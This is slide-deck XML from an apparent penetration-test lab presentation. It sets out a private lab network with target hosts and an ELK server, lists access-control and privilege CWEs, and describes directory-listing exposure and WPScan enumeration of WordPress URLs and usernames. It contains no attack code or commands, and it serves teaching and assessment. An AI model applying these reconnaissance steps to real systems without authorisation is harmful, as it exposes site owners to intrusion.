              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> defects in validation and canonicalization mechanisms can be detected. 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Google Shape;233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3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0" name="Google Shape;2340;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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4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2346" name="Google Shape;2346;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18480203" y="2427933"/>
            <a:ext cx="5364536" cy="10021976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200" u="sng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3200" u="sng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Address Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 10.0.0.1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3200" u="sng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b="1" sz="3200" u="sng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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target1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IPv4: 192.168.1.110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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target2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IPv4: 192.168.1.115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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>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IPv4: 192.168.1.90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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ELK Server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IPv4: 192.168.1.100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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2347" name="Google Shape;2347;p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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Diagram&#10;&#10;Description automatically generated" id="2348" name="Google Shape;23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3075" y="2897064"/>
            <a:ext cx="10608398" cy="1005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54" name="Google Shape;2354;p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5" name="Google Shape;2355;p5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Our assessment uncovered the following critical vulnerabilities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56" name="Google Shape;2356;p5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176962" y="43762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{AB76892F-4A5C-4B29-B97E-A2BCD0243B9D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5540350"/>
                <a:gridCol w="9689125"/>
                <a:gridCol w="6766150"/>
              </a:tblGrid>
              <a:tr h="113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/>
                </a:tc>
              </a:tr>
              <a:tr h="170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Exposure of Information through Directory Listing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solidFill>
                            <a:srgbClr val="00B05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4400" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="00B05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113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Requirements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44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113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CWE-284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Improper Access Control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44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113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CWE-269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Improper Privilege Management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44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1" name="Google Shape;23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6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Used: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Target 1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4" name="Google Shape;2364;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2370" name="Google Shape;2370;p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1" name="Google Shape;2371;p7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Browsing the public-facing website, the URL directory tree structure was visible. The information gathered provided valuable data using passive reconnaissance.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Graphical user interface, application&#10;&#10;Description automatically generated" id="2372" name="Google Shape;23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102" y="6145304"/>
            <a:ext cx="7164453" cy="348907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raphical user interface, text, application, email&#10;&#10;Description automatically generated" id="2373" name="Google Shape;237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69303" y="4233023"/>
            <a:ext cx="8296666" cy="373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374" name="Google Shape;237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40880" y="10949468"/>
            <a:ext cx="9029960" cy="14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website&#10;&#10;Description automatically generated" id="2375" name="Google Shape;237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1491" y="10691476"/>
            <a:ext cx="10751076" cy="1939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2376" name="Google Shape;237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35802" y="8243229"/>
            <a:ext cx="11661337" cy="216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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452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Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2382" name="Google Shape;2382;p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3" name="Google Shape;2383;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1924650"/>
            <a:ext cx="22942800" cy="11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WordPress has many known vulnerabilities, so active reconnaissance using the WPScan tool was used to enumerate WordPress websites.</a:t>
            </a:r>
            <a:endParaRPr/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It showed us URLs we had direct access to, including known attack vectors:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Text&#10;&#10;Description automatically generated" id="2384" name="Google Shape;238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7603" y="3611144"/>
            <a:ext cx="7648440" cy="489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385" name="Google Shape;238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374" y="11053101"/>
            <a:ext cx="8663920" cy="122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386" name="Google Shape;238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374" y="9260145"/>
            <a:ext cx="8663920" cy="1448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387" name="Google Shape;238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95967" y="9270121"/>
            <a:ext cx="14587508" cy="3118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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452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Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2393" name="Google Shape;2393;p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4" name="Google Shape;2394;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2396642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And it also identified usernames on the website:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2395" name="Google Shape;23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4800" y="3748615"/>
            <a:ext cx="18259948" cy="45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